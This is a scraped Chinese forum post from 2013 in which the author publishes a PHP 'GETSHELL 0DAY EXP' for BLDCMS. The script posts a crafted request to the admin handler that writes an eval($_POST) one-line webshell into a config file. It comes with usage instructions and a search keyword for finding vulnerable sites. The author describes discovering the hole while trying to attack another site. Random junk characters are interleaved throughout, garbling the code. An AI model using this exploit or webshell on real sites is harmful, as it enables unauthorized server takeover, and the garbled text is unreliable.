之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
+ {4 f( A( w1 r+ w# u0 s4 |
" ?# I; \, z5 r; n7 s4 B/ t
; H+ j& Q0 }( X4 B, F话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 & O$ \' \: s$ ]+ D& U
0 V; |: r, d. k! Z0 ~/ R既然都有人发了 我就把我之前写好的EXP放出来吧
+ L. a) o* W, l% M2 t- ^! x0 q ' v2 v9 @8 h# T9 p/ l4 M% Z
view source print?01.php;">7 {) k% b+ `: q$ S8 N5 D+ ~3 G
02.<!--?php
5 \! v# M8 |- y" i+ `, |7 I03.echo "-------------------------------------------------------------------
3 |! e% @! L& k; I/ s1 B2 |04. & D5 [9 C1 Q( G& P
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
7 A. t6 a. |! }8 t c( b, u" N" Q06. 2 @7 c$ J9 b5 D+ {/ p( m% d% P
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun! Y" M/ {, y6 F3 t
08. 7 S; d4 J( g/ Y0 v
09.QQ:981009941\r\n 2013.3.21\r\n
0 }& A% i8 B. h10. $ W; R8 G6 U) _5 n! Y" b
11. ' s7 m& o/ {3 d5 U9 Z
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
" _2 {4 i" A+ m7 n& U5 J' \13.
$ F) y8 `: r9 z5 m14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------, Y. a( G( r1 v" R$ M) L) h% L. I
15.
: j) |- N1 w6 f9 g- _16.--------------------------------------------------------------------\r\n";0 J6 T0 {& b& }" O
17.$url=$argv[1];- M* O( H f5 M) o% S$ L+ E
18.$dir=$argv[2];9 X0 }; P; R/ r* }# y! h$ z
19.$pass=$argv[3];' k2 c+ n3 j) Y: B: \% V/ D
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
; T+ `4 q0 @2 F+ `! N: O1 S2 o21.if (emptyempty($pass)||emptyempty($url))
" r0 I) Q' l0 g/ T8 ^9 Y6 ~22.{exit("请输入参数");}
, h2 r% {1 }; e9 q! p1 V3 ~. r23.else
4 X# |9 |; ~. _24.{
# j* w+ O. i; H0 X! T) k$ X25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev$ Q" {9 a; f" s/ G+ H* v# ^ z
26. , Q5 b4 m* `/ G/ t! Q. o8 t a9 J
27.al;
/ o; {1 E! v( H% s- ^; A0 x& H# F; s3 ^: I28.$length = strlen($fuckdata);# m) m+ c' Z/ O( f6 z8 i: Y1 `% S
29.function getshell($url,$pass)% X" Q) }) d! |- t5 w4 I
30.{
8 I9 |- b) e/ }" o31.global $url,$dir,$pass,$eval,$length,$fuckdata;
: v9 q4 J; X8 e) e- t6 h( n32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";2 v+ J8 n( |0 C7 {6 ]" R' K
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 n9 X- Y# s" q$ [: j2 m, ]34.$header .= "User-Agent: MSIE\r\n";! m: x, {9 O% y9 x! W+ Y1 X% d
35.$header .= "Host:".$url."\r\n";
+ @$ B0 ~0 V$ ?$ D( M% {' f3 c36.$header .= "Content-Length: ".$length."\r\n";- E0 n% |2 K i7 a: I# d4 u
37.$header .= "Connection: Close\r\n";
3 R5 r0 z' G- p38.$header .="\r\n";7 |+ v p5 `/ t4 q7 t
39.$header .= $fuckdata."\r\n\r\n";
" q) W5 r1 w2 O; I8 M5 U40.$fp = fsockopen($url, 80,$errno,$errstr,15);
* R8 C1 z4 s! y: D+ o9 F41.if (!$fp)( s; E: J2 S/ O1 K3 v% _* S0 q; q2 R. Z
42.{6 C* Z( U. p0 S
43.exit ("利用失败:请检查指定目标是否能正常打开");
8 b( x) P5 N. c; M* O44.}
# n3 u! Y" c/ c* J7 ~) n0 V45.else{ if (!fputs($fp,$header))9 d& _4 S" z3 `1 G+ O1 f) l4 v, }
46.{exit ("利用失败");}) [4 c1 ?7 {! b, e+ c7 q
47.else
0 } n+ L" h% m, W1 O( h48.{+ ^. L5 K. a. Z4 G
49.$receive = '';, ]+ T: d/ d' \) x' ~
50.while (!feof($fp)) {
' v( L8 Q( V3 K, j3 B$ l' p3 X F51.$receive .= @fgets($fp, 1000);
4 M2 g* {( M! j$ k+ D( ]52.}
. U" \3 _8 H9 `( @53.@fclose($fp);
- t$ R8 m' |9 t$ G5 y! ?! z2 `54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标1 l2 V& E+ [# J7 e
55.
* B8 z- b8 T5 C& p( a7 u56.GPC是否=off)";# R1 O8 x* Z5 D! Y+ `+ [
57.}}
1 `, r9 }6 ]9 c58.}! x8 U& I( r; R% F
59.}
0 _% p% ~) p) }8 w3 K1 B60.getshell($url,$pass);
- D1 ?" I3 G2 R% R3 {8 B1 l61.?-->0 d0 j/ ]- O; j" ?4 y$ i! d1 \
2 z7 {9 x! F3 G6 J7 \
. P$ w B1 y. u7 n; S
' u' U$ g& n$ F) Sby 数据流 P% T% b& Y& \# `- \. p+ f) g, B
|
发表于 2013-3-26 20:49:10
收藏
支持
反对